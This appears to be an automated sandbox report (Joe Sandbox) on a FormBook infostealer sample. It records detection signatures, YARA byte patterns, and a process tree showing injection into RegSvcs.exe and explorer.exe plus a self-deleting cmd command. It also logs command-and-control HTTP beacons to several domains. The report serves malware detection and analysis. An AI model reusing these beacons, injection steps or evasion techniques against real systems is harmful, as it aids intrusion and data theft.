Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report vOKMFxiCYt.exe

Overview

General Information

Sample Name:vOKMFxiCYt.exe
Analysis ID:321296
MD5:bb30a5dd4130b071fb4ca5f005371c63
SHA1:52c3ca02828a4ad8e8dbf790a61b3d77379ad391
SHA256:4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vOKMFxiCYt.exe (PID: 2764 cmdline: 'C:\Users\user\Desktop\vOKMFxiCYt.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
    • RegSvcs.exe (PID: 5984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: vOKMFxiCYt.exeReversingLabs: Detection: 35%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: vOKMFxiCYt.exeJoe Sandbox ML: detected
            Source: 1.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49737
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1Host: www.tessuto.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1Host: www.reem.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1Host: www.themaskedstitcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1Host: www.tessuto.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1Host: www.reem.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1Host: www.themaskedstitcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.tessuto.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:05:26 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
            Source: raserver.exe, 00000004.00000002.506812727.000000000574F000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: explorer.exe, 00000002.00000000.257287184.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: vOKMFxiCYt.exe, 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: vOKMFxiCYt.exe, 00000000.00000002.241448279.0000000000D2A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419D60 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E10 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E90 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00419E8A NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016998F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016995D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016997A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016999D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169B040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016998A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016995F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169A710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699FE0 NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01699610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016996D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D995D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D996D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D99710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D998F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D998A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9B040 NtSuspendThread,
